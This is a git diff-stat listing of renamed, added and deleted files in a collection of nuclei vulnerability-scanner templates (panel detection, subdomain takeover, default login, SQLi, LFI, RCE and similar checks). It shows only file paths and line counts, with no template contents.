nuclei-templates/Other/calendly.yaml | 25 + ...break-cms.yaml => call-break-cms-840.yaml} | 0 
.../Other/campaignmonitor-843.yaml | 17 - .../Other/campaignmonitor-844.yaml | 26 + .../Other/can-i-take-over-dns-852.yaml | 144 + .../Other/can-i-take-over-dns-853.yaml | 140 - .../Other/canal-default-login-846.yaml | 14 - .../Other/candidate-application-lfi-850.yaml | 27 - .../Other/candidate-application-lfi-851.yaml | 20 + .../Other/canny-takeover-854.yaml | 18 - .../Other/canny-takeover-856.yaml | 17 + .../Other/carestream-vue-detect-860.yaml | 30 + .../Other/carestream-vue-detect-861.yaml | 31 - .../Other/cargo-takeover-868.yaml | 15 - nuclei-templates/Other/cargo-takeover.yaml | 15 + .../Other/cargocollective-takeover-862.yaml | 20 + .../Other/cargocollective-takeover-864.yaml | 18 - nuclei-templates/Other/cas-login-870.yaml | 19 - nuclei-templates/Other/cas-login.yaml | 22 + nuclei-templates/Other/casbin.yaml | 21 + nuclei-templates/Other/cerebro-panel-881.yaml | 27 - nuclei-templates/Other/cerebro-panel.yaml | 26 + ...2.yaml => certificate-validation-884.yaml} | 0 .../Other/cf7-message-filter.yaml | 59 + nuclei-templates/Other/cgi-printenv-885.yaml | 26 + nuclei-templates/Other/cgi-printenv-886.yaml | 30 - nuclei-templates/Other/cgi-test-page-887.yaml | 24 + nuclei-templates/Other/cgi-test-page.yaml | 22 - .../Other/chamilo-lms-sqli-892.yaml | 30 - nuclei-templates/Other/chamilo-lms-sqli.yaml | 26 + .../Other/chamilo-lms-xss-893.yaml | 24 - nuclei-templates/Other/chamilo-lms-xss.yaml | 24 + ...et-crm-sqli.yaml => chanjet-CRM-sqli.yaml} | 0 ...anel-895.yaml => checkmarx-panel-897.yaml} | 0 ...t-panel-899.yaml => checkpoint-panel.yaml} | 0 .../Other/cherry-file-download-900.yaml | 31 + .../Other/cherry-file-download.yaml | 25 - nuclei-templates/Other/cherry-lfi-902.yaml | 36 - nuclei-templates/Other/cherry-lfi-903.yaml | 25 + ...-detect.yaml => chevereto-detect-905.yaml} | 0 .../Other/chinaunicom-default-login-906.yaml | 33 - .../Other/chinaunicom-default-login-908.yaml | 38 + nuclei-templates/Other/churchope-lfi-915.yaml | 32 - 
nuclei-templates/Other/churchope-lfi.yaml | 28 + .../Other/circarlife-setup-917.yaml | 28 + nuclei-templates/Other/circarlife-setup.yaml | 28 - .../Other/circleci-config-924.yaml | 26 - .../Other/circleci-config-925.yaml | 25 + .../Other/circleci-ssh-config-928.yaml | 27 + .../Other/circleci-ssh-config.yaml | 27 - ...yaml => cisco-ace-device-manager-931.yaml} | 0 .../Other/cisco-asa-panel-932.yaml | 22 - .../Other/cisco-asa-panel-934.yaml | 16 + .../Other/cisco-edge-340-936.yaml | 21 - nuclei-templates/Other/cisco-edge-340.yaml | 25 + .../Other/cisco-finesse-login-940.yaml | 23 - .../Other/cisco-finesse-login.yaml | 22 + .../Other/cisco-integrated-login-943.yaml | 23 - .../Other/cisco-integrated-login.yaml | 22 + ...re-944.yaml => cisco-meraki-exposure.yaml} | 0 .../Other/cisco-network-config-950.yaml | 25 + .../Other/cisco-network-config.yaml | 24 - ...ml => cisco-prime-infrastructure-952.yaml} | 0 nuclei-templates/Other/cisco-sd-wan-957.yaml | 26 - nuclei-templates/Other/cisco-sd-wan.yaml | 25 + ...960.yaml => cisco-secure-desktop-962.yaml} | 0 .../Other/cisco-sendgrid-965.yaml | 31 + .../Other/cisco-sendgrid-967.yaml | 30 - .../Other/cisco-smi-exposure-970.yaml | 33 - .../Other/cisco-smi-exposure.yaml | 33 + ...ogin.yaml => cisco-systems-login-975.yaml} | 0 .../Other/cisco-telepresence-976.yaml | 24 - .../Other/cisco-telepresence.yaml | 25 + ...ogin.yaml => cisco-ucs-kvm-login-980.yaml} | 0 .../Other/citrix-adc-gateway-detect-981.yaml | 20 - .../Other/citrix-adc-gateway-detect.yaml | 16 + .../Other/citrix-vpn-detect-987.yaml | 16 + nuclei-templates/Other/citrix-vpn-detect.yaml | 16 - .../Other/ckan-dom-based-xss.yaml | 5 - .../Other/cl-te-http-smuggling.yaml | 37 - ...el-996.yaml => clave-login-panel-994.yaml} | 0 ...yaml => clearpass-policy-manager-997.yaml} | 0 .../Other/clickhouse-unauth-1002.yaml | 29 - nuclei-templates/Other/clickhouse-unauth.yaml | 20 + .../Other/clientaccesspolicy-1005.yaml | 25 + .../Other/clientaccesspolicy-1007.yaml | 25 - 
.../Other/clockwatch-enterprise-rce-1008.yaml | 6 - .../clockwork-dashboard-exposure-1015.yaml | 31 + .../Other/clockwork-dashboard-exposure.yaml | 27 - .../Other/clockwork-php-page-1019.yaml | 25 + .../Other/clockwork-php-page.yaml | 22 - ...f.yaml => cloudflare-image-ssrf-1021.yaml} | 0 ...udinary-1026.yaml => cloudinary-1025.yaml} | 0 .../Other/cname-service-detection-1031.yaml | 37 + .../Other/cname-service-detection-1032.yaml | 33 - ....yaml => cname-service-detector-1034.yaml} | 0 .../Other/cnvd-2018-13393-1037.yaml | 25 + .../Other/cnvd-2018-13393-1038.yaml | 21 - ...9-01348.yaml => cnvd-2019-01348-1044.yaml} | 0 .../Other/cnvd-2019-06255-1049.yaml | 33 - .../Other/cnvd-2019-06255-1050.yaml | 33 + nuclei-templates/Other/cnvd-2019-17294.yaml | 37 - .../Other/cnvd-2019-19299-1051.yaml | 50 - .../Other/cnvd-2019-19299-1052.yaml | 43 + ...9-32204.yaml => cnvd-2019-32204-1054.yaml} | 0 .../Other/cnvd-2020-23735-1058.yaml | 14 +- .../Other/cnvd-2020-46552-1060.yaml | 32 + nuclei-templates/Other/cnvd-2020-46552.yaml | 30 - .../Other/cnvd-2020-56167-1064.yaml | 30 + .../Other/cnvd-2020-62422-1067.yaml | 27 - .../Other/cnvd-2020-62422-1069.yaml | 32 + .../Other/cnvd-2020-67113-1071.yaml | 6 + .../Other/cnvd-2021-01931-1079.yaml | 5 +- .../Other/cnvd-2021-09650-1080.yaml | 3 - .../Other/cnvd-2021-10543-1082.yaml | 21 - .../Other/cnvd-2021-10543-1084.yaml | 22 + ...22-1092.yaml => cnvd-2021-15822-1093.yaml} | 0 .../Other/cnvd-2021-15824-1096.yaml | 32 + .../Other/cnvd-2021-15824-1097.yaml | 36 - .../Other/cnvd-2021-17369-1102.yaml | 32 + .../Other/cnvd-2021-26422-1103.yaml | 36 - .../Other/cnvd-2021-26422-1104.yaml | 25 + .../Other/cnvd-2021-30167-1108.yaml | 44 + .../Other/cnvd-2021-30167-1109.yaml | 36 - ...1.yaml => cobbler-default-login-1120.yaml} | 0 .../Other/cockpit-detect-1125.yaml | 16 + .../Other/cockpit-detect-1127.yaml | 15 - ...rkflow.yaml => cockpit-workflow-1129.yaml} | 0 .../Other/codemeter-webadmin-panel-1135.yaml | 25 + 
.../Other/codemeter-webadmin-panel-1137.yaml | 27 - ...-login-1140.yaml => codian-mcu-login.yaml} | 0 .../Other/cofense-vision-panel-1141.yaml | 20 - .../Other/cofense-vision-panel-1142.yaml | 28 + ...1149.yaml => cold-fusion-cfcache-map.yaml} | 0 .../coldfusion-administrator-login-1145.yaml | 26 - .../Other/coldfusion-administrator-login.yaml | 24 + .../Other/coldfusion-debug-xss-1152.yaml | 29 + .../Other/coldfusion-debug-xss-1154.yaml | 34 - .../commax-biometric-auth-bypass-1157.yaml | 33 + .../Other/commax-biometric-auth-bypass.yaml | 30 - .../commax-credentials-disclosure-1158.yaml | 26 - .../Other/commax-credentials-disclosure.yaml | 25 + .../comtrend-password-exposure-1166.yaml | 28 - .../Other/comtrend-password-exposure.yaml | 23 + .../Other/concourse-ci-panel-1169.yaml | 24 + .../Other/concourse-ci-panel.yaml | 19 - nuclei-templates/Other/concrete-xss-1177.yaml | 35 + nuclei-templates/Other/concrete-xss-1178.yaml | 30 - .../Other/concrete5-install-1171.yaml | 33 - nuclei-templates/Other/concrete5-install.yaml | 29 + .../Other/concrete5-panel-1172.yaml | 32 + nuclei-templates/Other/concrete5-panel.yaml | 33 - ...3.yaml => configuration-listing-1182.yaml} | 0 .../Other/confluence-detect-1187.yaml | 41 + nuclei-templates/Other/confluence-detect.yaml | 41 - ...l => confluence-ssrf-sharelinks-1192.yaml} | 0 .../{contacam-1197.yaml => contacam.yaml} | 0 .../Other/content-scheme-1205.yaml | 16 - nuclei-templates/Other/content-scheme.yaml | 15 + .../Other/contentkeeper-detect-1203.yaml | 32 + .../Other/contentkeeper-detect.yaml | 31 - .../Other/core-chuangtian-cloud-rce-1209.yaml | 38 + .../Other/core-chuangtian-cloud-rce-1211.yaml | 41 - .../coremail-config-disclosure-1215.yaml | 27 + .../Other/coremail-config-disclosure.yaml | 24 - ...2.yaml => couchbase-buckets-api-1233.yaml} | 0 ...e-1239.yaml => couchdb-exposure-1238.yaml} | 0 nuclei-templates/Other/couchdb-fauxton.yaml | 4 +- .../Other/craft-cms-detect-1247.yaml | 28 - 
nuclei-templates/Other/craft-cms-detect.yaml | 27 + .../Other/craftcms-admin-panel-1245.yaml | 21 + .../Other/craftcms-admin-panel.yaml | 25 - .../Other/credential-exposure-1249.yaml | 715 + .../Other/credential-exposure-file.yaml | 720 - nuclei-templates/Other/credentials-1257.yaml | 16 - .../Other/credentials-disclosure-1252.yaml | 712 + .../Other/credentials-disclosure.yaml | 715 - nuclei-templates/Other/credentials.yaml | 13 + nuclei-templates/Other/crlf-injection.yaml | 10 +- nuclei-templates/Other/crmeb-sqli.yaml | 20 - .../Other/crossdomain-xml-1267.yaml | 3 +- ...detect.yaml => crush-ftp-detect-1271.yaml} | 0 ...p-login-1275.yaml => crush-ftp-login.yaml} | 0 .../cs-cart-unauthenticated-lfi-1281.yaml | 26 - .../Other/cs-cart-unauthenticated-lfi.yaml | 20 + .../Other/cs141-default-login-1280.yaml | 50 + .../Other/cs141-default-login.yaml | 44 - .../Other/csrfguard-detect-1291.yaml | 71 - nuclei-templates/Other/csrfguard-detect.yaml | 72 + .../Other/custom-solr-file-read.yaml | 37 - nuclei-templates/Other/custom-xss-check.yaml | 41 - nuclei-templates/Other/custom_nuclei-7.yaml | 44 + ...ud-login.yaml => cx-cloud-login-6765.yaml} | 0 ...045.yaml => d-link-arbitary-fileread.yaml} | 0 .../Other/d-link-wireless-7050.yaml | 23 + nuclei-templates/Other/d-link-wireless.yaml | 23 - .../dahua-wpms-addimgico-fileupload.yaml | 68 + ...\347\220\206\345\271\263\345\217\260.yaml" | 43 + .../Other/darkstat-detect-6767.yaml | 34 + nuclei-templates/Other/darkstat-detect.yaml | 33 - .../Other/database-error-6770.yaml | 19 - nuclei-templates/Other/database-error.yaml | 20 + .../Other/db-backup-lfi-6775.yaml | 7 +- .../{db-schema-6783.yaml => db-schema.yaml} | 0 .../Other/dbeaver-credentials-6779.yaml | 35 - .../Other/dbeaver-credentials-6782.yaml | 24 + .../Other/dead-host-with-cname-6786.yaml | 22 - .../Other/dead-host-with-cname-6787.yaml | 23 + ...dedecms-carbuyaction-fileinclude-6794.yaml | 24 + .../dedecms-carbuyaction-fileinclude.yaml | 29 - 
.../Other/dedecms-membergroup-sqli-6796.yaml | 27 + .../Other/dedecms-membergroup-sqli-6798.yaml | 20 - ...03.yaml => dedecms-openredirect-6802.yaml} | 0 .../Other/default-apache-test-page-6816.yaml | 17 - .../Other/default-apache-test-page-6817.yaml | 19 + .../Other/default-apache2-page-6806.yaml | 20 + .../Other/default-apache2-page.yaml | 19 - .../default-apache2-ubuntu-page-6810.yaml | 2 - .../Other/default-codeigniter-page-6831.yaml | 23 + .../Other/default-codeigniter-page-6832.yaml | 24 - .../Other/default-django-page-6840.yaml | 17 + .../Other/default-django-page.yaml | 17 - .../Other/default-fastcgi-page-6844.yaml | 17 - .../Other/default-fastcgi-page-6845.yaml | 18 + ...age.yaml => default-fedora-page-6850.yaml} | 0 .../default-glassfish-server-page-6853.yaml | 3 +- ...6857.yaml => default-ibm-http-server.yaml} | 0 ...-page.yaml => default-iis7-page-6859.yaml} | 0 ...6864.yaml => default-jetty-page-6862.yaml} | 0 .../Other/default-lighttpd-page-6866.yaml | 22 + .../Other/default-lighttpd-page.yaml | 20 - ...=> default-microsoft-azure-page-6874.yaml} | 0 .../Other/default-movable-page-6878.yaml | 17 + .../Other/default-movable-page.yaml | 17 - .../Other/default-nginx-page-6881.yaml | 17 - .../Other/default-nginx-page-6882.yaml | 19 + ...-6886.yaml => default-openresty-6884.yaml} | 0 .../default-oracle-application-page-6891.yaml | 3 - .../default-payara-server-page-6895.yaml | 5 +- .../Other/default-plesk-page-6900.yaml | 3 +- ...aml => default-redhat-test-page-6904.yaml} | 0 .../Other/default-ssltls-test-page-6907.yaml | 19 - .../Other/default-ssltls-test-page-6908.yaml | 18 + ...age.yaml => default-tomcat-page-6911.yaml} | 0 .../default-windows-server-page-6912.yaml | 19 - .../Other/default-windows-server-page.yaml | 17 + .../Other/defectdojo-panel-6916.yaml | 16 + nuclei-templates/Other/defectdojo-panel.yaml | 19 - .../Other/dell-idrac-default-login-6942.yaml | 44 + .../Other/dell-idrac-default-login-6943.yaml | 38 - ...low.yaml => 
dell-idrac-workflow-6947.yaml} | 0 .../Other/dell-idrac6-detect-6918.yaml | 29 + .../Other/dell-idrac6-detect-6919.yaml | 25 - .../Other/dell-idrac7-detect-6922.yaml | 25 + .../Other/dell-idrac7-detect-6924.yaml | 29 - .../Other/dell-idrac9-default-login-6934.yaml | 37 - .../Other/dell-idrac9-default-login.yaml | 30 + .../Other/dell-idrac9-detect-6937.yaml | 36 + .../Other/dell-idrac9-detect.yaml | 35 - .../Other/dell-openmanager-login-6949.yaml | 23 + .../Other/dell-openmanager-login-6950.yaml | 26 - .../Other/dell-wyse-login-6954.yaml | 24 + .../Other/dell-wyse-login-6955.yaml | 20 - .../Other/deprecated-tls-6959.yaml | 25 + nuclei-templates/Other/deprecated-tls.yaml | 17 - .../detect-addpac-voip-gateway-6963.yaml | 26 + .../Other/detect-addpac-voip-gateway.yaml | 30 - .../Other/detect-all-takovers.yaml | 183 - .../Other/detect-dangling-cname-6967.yaml | 5 - .../Other/detect-dns-over-https-6969.yaml | 31 - .../Other/detect-dns-over-https-6970.yaml | 28 + .../Other/detect-drone-config-6973.yaml | 22 + .../Other/detect-drone-config.yaml | 26 - .../Other/detect-jabber-xmpp-6974.yaml | 25 + .../Other/detect-jabber-xmpp.yaml | 20 - .../Other/detect-options-method-6977.yaml | 19 + .../Other/detect-options-method.yaml | 16 - .../Other/detect-rsyncd-6979.yaml | 29 + .../Other/detect-rsyncd-6980.yaml | 27 - .../Other/detect-sentry-6983.yaml | 5 +- nuclei-templates/Other/development-logs.yaml | 5 + ...s-lfi-6993.yaml => dicoogle-pacs-lfi.yaml} | 0 ...nage-rce.yaml => digital-signage-rce.yaml} | 0 nuclei-templates/Other/dir-listing-7008.yaml | 16 - nuclei-templates/Other/dir-listing.yaml | 19 + .../Other/directadmin-login-panel-7000.yaml | 23 + .../Other/directadmin-login-panel-7001.yaml | 27 - .../Other/discourse-xss-7013.yaml | 28 - nuclei-templates/Other/discourse-xss.yaml | 24 + .../Other/discuz-config-global.yaml | 10 +- .../Other/display-via-header-7017.yaml | 2 +- ...anel.yaml => django-admin-panel-7021.yaml} | 0 .../Other/django-debug-detect-7027.yaml | 21 - 
...1.yaml => django-debug-exposure-csrf.yaml} | 0 nuclei-templates/Other/django-debug.yaml | 25 + nuclei-templates/Other/django-debugmode.yaml | 8 +- ... => django-framework-exceptions-7034.yaml} | 0 nuclei-templates/Other/django-secret-key.yaml | 28 + nuclei-templates/Other/django-secret.key.yaml | 46 - .../Other/dlink-850L-info-leak.yaml | 29 + .../Other/dlink-850l-info-leak-7038.yaml | 27 - .../Other/dns-waf-detect-7052.yaml | 137 - .../Other/dns-waf-detect-7053.yaml | 171 + .../Other/dnssec-detection-7051.yaml | 22 - nuclei-templates/Other/dnssec-detection.yaml | 19 + ...ord-sqli.yaml => doccms-keyword-sqli.yaml} | 0 nuclei-templates/Other/docker-api.yaml | 29 - .../Other/docker-compose-config-7059.yaml | 5 - .../Other/docker-registry-7067.yaml | 22 + .../Other/docker-registry-7068.yaml | 23 - .../Other/dockercfg-config-7055.yaml | 32 - .../Other/dockercfg-config-7056.yaml | 26 + .../dockerfile-hidden-disclosure-7063.yaml | 32 + .../Other/dockerfile-hidden-disclosure.yaml | 27 - nuclei-templates/Other/dokmee ecm.yaml | 19 + .../dolphinscheduler-default-login-7072.yaml | 42 - .../dolphinscheduler-default-login-7073.yaml | 42 + nuclei-templates/Other/dom-xss-7079.yaml | 43 + nuclei-templates/Other/domcfg-page-7077.yaml | 25 - nuclei-templates/Other/domcfg-page.yaml | 22 + nuclei-templates/Other/domxss.yaml | 43 - ...ct-7083.yaml => dotclear-detect-7084.yaml} | 0 .../Other/dotnetcms-sqli-7089.yaml | 29 + .../Other/druid-console-exposure-7092.yaml | 19 + .../Other/druid-console-exposure-7094.yaml | 16 - ...096.yaml => druid-default-login-7097.yaml} | 0 .../Other/druid-monitor-7100.yaml | 21 - .../Other/druid-monitor-7102.yaml | 22 + ...all-7106.yaml => drupal-install-7107.yaml} | 0 ...9.yaml => drupal-user-enum-ajax-7111.yaml} | 0 .../Other/drupal-user-enum-redirect-7115.yaml | 14 +- .../{ds_store.yaml => ds_store-7119.yaml} | 0 .../Other/{DSE855.yaml => dse855.yaml} | 0 .../Other/dss-download-fileread-7116.yaml | 24 + .../Other/dss-download-fileread-7117.yaml | 27 
- .../Other/duomicms-sql-injection-7122.yaml | 25 - .../Other/duomicms-sql-injection-7125.yaml | 27 + ...ogin-7129.yaml => dvwa-default-login.yaml} | 0 ...> dvwa-headless-automatic-login-7133.yaml} | 0 .../Other/dwr-index-detect-7134.yaml | 29 + .../Other/dwr-index-detect-7135.yaml | 23 - .../Other/dwsync-exposure-7139.yaml | 35 + nuclei-templates/Other/dwsync-exposure.yaml | 30 - ...l => dynamic-broadcast-receiver-7140.yaml} | 0 .../Other/dynamicweb-panel-7143.yaml | 36 - .../Other/dynamicweb-panel-7144.yaml | 30 + ....yaml => dzs-zoomsounds-listing-7147.yaml} | 0 .../easy-media-gallery-pro-listing-7150.yaml | 25 - .../easy-media-gallery-pro-listing-7153.yaml | 22 + .../Other/easy-wp-smtp-listing-7154.yaml | 2 + .../eatery-restaurant-open-redirect-7158.yaml | 18 + .../eatery-restaurant-open-redirect.yaml | 18 - .../Other/ec2-detection-7163.yaml | 13 +- .../ecology-arbitrary-file-upload-7169.yaml | 45 + .../Other/ecology-arbitrary-file-upload.yaml | 35 - ...ogy-filedownload-directory-traversal.yaml} | 0 ...ecology-oa-HrmCareerApplyPerView-sqli.yaml | 52 + ...ecology_E-Office_Uploadify_FileUpload.yaml | 29 - .../Other/eg-manager-detect-7184.yaml | 25 + nuclei-templates/Other/eg-manager-detect.yaml | 20 - .../Other/elFinder-path-traversal.yaml | 37 - .../Other/elasticbeantalk-takeover-7188.yaml | 43 + .../Other/elasticbeantalk-takeover.yaml | 36 - .../Other/elasticsearch-7196.yaml | 34 - nuclei-templates/Other/elasticsearch.yaml | 23 + .../Other/elex-woocommerce-xss-7200.yaml | 48 - .../Other/elex-woocommerce-xss.yaml | 35 + .../Other/elfinder-path-traversal(1).yaml | 27 + .../Other/elfinder-version-7205.yaml | 37 - nuclei-templates/Other/elfinder-version.yaml | 38 + .../Other/emcecom-default-login-7211.yaml | 32 + .../Other/emcecom-default-login-7212.yaml | 45 - .../Other/emerson-power-panel-7217.yaml | 4 - ...ate-sqli.yaml => empirecms-rate-sqli.yaml} | 0 ...recms-xss-7220.yaml => empirecms-xss.yaml} | 0 ...7222.yaml => emqx-default-login-7221.yaml} | 0 
...el-7225.yaml => ems-login-panel-7223.yaml} | 0 nuclei-templates/Other/env.yaml | 24 + ...p-login-7229.yaml => epmp-login-7231.yaml} | 0 .../Other/epson-projector-detect-7238.yaml | 27 + .../Other/epson-projector-detect.yaml | 26 - .../Other/epson-web-control-detect-7242.yaml | 28 - .../Other/epson-web-control-detect.yaml | 22 + ...-series-7244.yaml => epson-wf-series.yaml} | 0 .../erp-nc-directory-traversal-7245.yaml | 28 - .../erp-nc-directory-traversal-7248.yaml | 24 + .../Other/error-based-sql-injection-7249.yaml | 482 + .../Other/error-based-sql-injection.yaml | 476 - .../Other/{time.yaml => error-based.yaml} | 0 ...or-logs-7255.yaml => error-logs-7252.yaml} | 0 .../Other/esmtprc-config-7258.yaml | 27 + nuclei-templates/Other/esmtprc-config.yaml | 28 - .../{etcd-keys-7261.yaml => etcd-keys.yaml} | 0 .../Other/etouch-v2-sqli-7266.yaml | 26 - nuclei-templates/Other/etouch-v2-sqli.yaml | 22 + .../ewebs-arbitrary-file-reading-7270.yaml | 5 + .../Other/exacqvision-default-login-7274.yaml | 42 - .../Other/exacqvision-default-login-7275.yaml | 49 + nuclei-templates/Other/example-template.yaml | 58 - .../Other/exploit-cve-2022-1388.yaml | 66 - ...detect-7279.yaml => expn-mail-detect.yaml} | 0 nuclei-templates/Other/exposed-adb-7280.yaml | 28 + nuclei-templates/Other/exposed-adb-7281.yaml | 22 - ...ing.yaml => exposed-alps-spring-7285.yaml} | 0 .../exposed-authentication-asmx-7288.yaml | 7 +- ...eeper.yaml => exposed-bitkeeper-7291.yaml} | 0 nuclei-templates/Other/exposed-bzr-7295.yaml | 3 +- ...sed-darcs-7298.yaml => exposed-darcs.yaml} | 0 .../Other/exposed-docker-api-7301.yaml | 29 + .../Other/exposed-gitignore-7303.yaml | 41 +- .../Other/exposed-glances-api-7309.yaml | 25 - .../Other/exposed-glances-api.yaml | 27 + .../exposed-jquery-file-upload-7315.yaml | 25 - .../Other/exposed-jquery-file-upload.yaml | 21 + .../Other/exposed-kibana-7319.yaml | 22 - .../Other/exposed-kibana-7320.yaml | 25 + ...sed-nomad-7329.yaml => exposed-nomad.yaml} | 0 
.../Other/exposed-redis-7335.yaml | 23 + .../Other/exposed-redis-7336.yaml | 23 - ...343.yaml => exposed-service-now-7342.yaml} | 0 .../Other/exposed-sharepoint-list-7346.yaml | 2 +- .../Other/exposed-springboot.yaml | 34 + ....yaml => exposed-sqlite-manager-7350.yaml} | 0 ...ed-svn-7351.yaml => exposed-svn-7354.yaml} | 0 .../Other/exposed-webalizer-7358.yaml | 18 - nuclei-templates/Other/exposed-webalizer.yaml | 18 + ...eeper.yaml => exposed-zookeeper-7363.yaml} | 0 ...ost (copy 1).yaml => expresslfr_post.yaml} | 0 nuclei-templates/Other/exsi-system-7366.yaml | 20 - nuclei-templates/Other/exsi-system.yaml | 23 + ...ui.yaml => extreme-netconfig-ui-7372.yaml} | 0 nuclei-templates/Other/eyelock-nano-lfd.yaml | 12 +- .../Other/f-secure-policy-manager-7564.yaml | 20 + .../Other/f-secure-policy-manager.yaml | 23 - .../Other/facebook-client-id-7385.yaml | 16 + .../Other/facebook-client-id.yaml | 16 - nuclei-templates/Other/facebook-secrets.yaml | 35 - ...tion.yaml => fanruan-deserialization.yaml} | 0 ...390.yaml => fanruanoa2012-disclosure.yaml} | 0 .../Other/faraday-login-7395.yaml | 23 - .../Other/faraday-login-7397.yaml | 24 + ...-docs-7399.yaml => fastapi-docs-7398.yaml} | 0 .../Other/fastjson-1-2-41-rce-7403.yaml | 35 + .../Other/fastjson-1-2-41-rce-7404.yaml | 31 - .../Other/fastjson-1-2-42-rce.yaml | 9 +- ...rce.yaml => fastjson-1-2-43-rce-7412.yaml} | 0 .../Other/fastjson-1-2-47-rce-7415.yaml | 47 - .../Other/fastjson-1-2-47-rce.yaml | 40 + .../Other/fastjson-1-2-62-rce-7420.yaml | 34 + .../Other/fastjson-1-2-62-rce.yaml | 30 - ...rce-7423.yaml => fastjson-1-2-67-rce.yaml} | 0 .../Other/fastjson-1-2-68-rce-7425.yaml | 57 - .../Other/fastjson-1-2-68-rce.yaml | 49 + .../Other/fatpipe-auth-bypass-7431.yaml | 39 - .../Other/fatpipe-auth-bypass.yaml | 33 + ...nel-7436.yaml => fatpipe-ipvpn-panel.yaml} | 0 .../Other/favicon-detection-7441.yaml | 2051 - nuclei-templates/Other/favicon-detection.yaml | 2034 + .../Other/fcm-server-key-7452.yaml | 16 + 
.../Other/fcm-server-key-7453.yaml | 19 - .../Other/feedpress-takeover-7456.yaml | 18 + .../Other/feedpress-takeover-7457.yaml | 15 - nuclei-templates/Other/feedwordpress-xss.yaml | 3 +- .../Other/feifeicms-lfr-7462.yaml | 26 - .../Other/feifeicms-lfr-7466.yaml | 33 + nuclei-templates/Other/file-scheme-7468.yaml | 15 + nuclei-templates/Other/file-scheme-7469.yaml | 16 - nuclei-templates/Other/filezilla-7470.yaml | 26 - nuclei-templates/Other/filezilla.yaml | 25 + .../Other/finereport-path-traversal-7478.yaml | 7 +- ...on-7484.yaml => fiorilaunchpad-logon.yaml} | 0 .../Other/firebase-config-exposure-7485.yaml | 8 +- .../Other/firebase-database-7489.yaml | 17 + .../Other/firebase-database-7490.yaml | 17 - .../Other/firebase-detect-7493.yaml | 20 - .../Other/firebase-detect-7494.yaml | 17 + .../Other/firebase-urls-7498.yaml | 23 + .../Other/firebase-urls-7499.yaml | 23 - ... => fireware-xtm-user-authentication.yaml} | 0 .../Other/flexbe-takeover-7505.yaml | 23 - .../Other/flexbe-takeover-7506.yaml | 23 + .../Other/flightpath-panel-7508.yaml | 24 - nuclei-templates/Other/flightpath-panel.yaml | 25 + .../Other/flink-exposure-7509.yaml | 17 - nuclei-templates/Other/flink-exposure.yaml | 17 + ...ogin.yaml => flir-default-login-7513.yaml} | 0 .../Other/flywheel-takeover-7525.yaml | 7 +- nuclei-templates/Other/forcepoint-7529.yaml | 25 + nuclei-templates/Other/forcepoint.yaml | 30 - .../Other/fortinet-fortigate-panel-7533.yaml | 2 +- .../foulenzer-subdomain-tk (copy 1).yaml | 387 + .../Other/freshdesk-takeover-7540.yaml | 22 - .../Other/freshdesk-takeover.yaml | 22 + .../Other/front-page-misconfig-7547.yaml | 25 - .../Other/front-page-misconfig-7548.yaml | 23 + .../Other/frontify-takeover-7544.yaml | 8 +- .../Other/froxlor-detect-7551.yaml | 48 +- .../Other/frp-default-login-7557.yaml | 35 - .../Other/frp-default-login-7559.yaml | 41 + .../Other/ftp-default-credentials.yaml | 30 + nuclei-templates/Other/ftp-default-creds.yaml | 22 - .../Other/ftp-weak-credentials-7569.yaml 
| 6 + nuclei-templates/Other/ftpconfig-7565.yaml | 25 + nuclei-templates/Other/ftpconfig-7566.yaml | 30 - .../Other/fuelcms-default-login-7572.yaml | 16 +- nuclei-templates/Other/gSOAP-LFl.yaml | 31 - .../Other/ganglia-xml-grid-monitor-7573.yaml | 26 + .../Other/ganglia-xml-grid-monitor.yaml | 26 - .../Other/gemfury-takeover-7576.yaml | 19 + .../Other/gemfury-takeover-7579.yaml | 16 - ...ens-7580.yaml => general-tokens-7586.yaml} | 0 .../Other/generic-linux-lfi-7588.yaml | 42 - .../Other/generic-linux-lfi-7589.yaml | 45 + .../Other/generic-windows-lfi-7592.yaml | 29 - .../Other/generic-windows-lfi.yaml | 32 + .../geovision-geowebserver-lfi-7595.yaml | 31 - .../geovision-geowebserver-lfi-7596.yaml | 32 + .../geovision-geowebserver-xss-7600.yaml | 34 - .../Other/geovision-geowebserver-xss.yaml | 28 + nuclei-templates/Other/gespage-panel.yaml | 7 +- nuclei-templates/Other/get-override-sni.yaml | 18 - ...09.yaml => getresponse-takeover-7608.yaml} | 0 .../Other/getsimple-cms-detect-7614.yaml | 6 +- .../Other/getsimple-cms-detector-7613.yaml | 22 + .../Other/getsimple-cms-detector.yaml | 22 - .../Other/getsimple-installation-7618.yaml | 26 + .../Other/getsimple-installation.yaml | 22 - ...le-leakage.yaml => getsimple-leakage.yaml} | 0 .../Other/ghost-takeover-7620.yaml | 20 - .../Other/ghost-takeover-7621.yaml | 21 + nuclei-templates/Other/git-config-7635.yaml | 26 + nuclei-templates/Other/git-config-7636.yaml | 31 - ...l => git-config-nginxoffbyslash-7631.yaml} | 0 .../git-credentials-disclosure-7639.yaml | 33 - .../Other/git-credentials-disclosure.yaml | 32 + nuclei-templates/Other/git-mailmap-7710.yaml | 19 - nuclei-templates/Other/git-mailmap.yaml | 38 + ...k-detect.yaml => gitbook-detect-7624.yaml} | 0 .../Other/gitbook-takeover-7626.yaml | 3 - ...-login-7645.yaml => gitea-login-7646.yaml} | 0 ...aml => github-enterprise-detect-7649.yaml} | 0 ...es.yaml => github-gemfile-files-7652.yaml} | 0 .../Other/github-page-config-7655.yaml | 4 +- 
.../Other/github-takeover-7660.yaml | 24 + .../Other/github-takeover-7663.yaml | 20 - ... => github-workflows-disclosure-7665.yaml} | 0 .../Other/gitlab-api-user-enum.yaml | 2 - ...ab-detect.yaml => gitlab-detect-7673.yaml} | 0 .../Other/gitlab-public-repos-7677.yaml | 27 + .../Other/gitlab-public-repos-7680.yaml | 29 - ...83.yaml => gitlab-public-signup-7684.yaml} | 0 .../Other/gitlab-public-snippets-7685.yaml | 35 + .../Other/gitlab-public-snippets-7686.yaml | 30 - nuclei-templates/Other/gitlab-rce-7692.yaml | 56 - nuclei-templates/Other/gitlab-rce-7693.yaml | 64 + .../Other/gitlab-uninitialized-password.yaml | 4 +- ...r-enum.yaml => gitlab-user-enum-7701.yaml} | 0 .../Other/gitlab-weak-login-7704.yaml | 58 - .../Other/gitlab-weak-login-7705.yaml | 47 + ...7715.yaml => global-domains-lfi-7714.yaml} | 0 .../Other/global-domains-xss-7717.yaml | 30 - .../Other/global-domains-xss-7718.yaml | 24 + ...nel.yaml => globalprotect-panel-7719.yaml} | 0 ...gloo-unauth.yaml => gloo-unauth-7722.yaml} | 0 .../Other/glpi-9.3.3-sql-injection(1).yaml | 30 + ...ion.yaml => glpi-authentication-7729.yaml} | 0 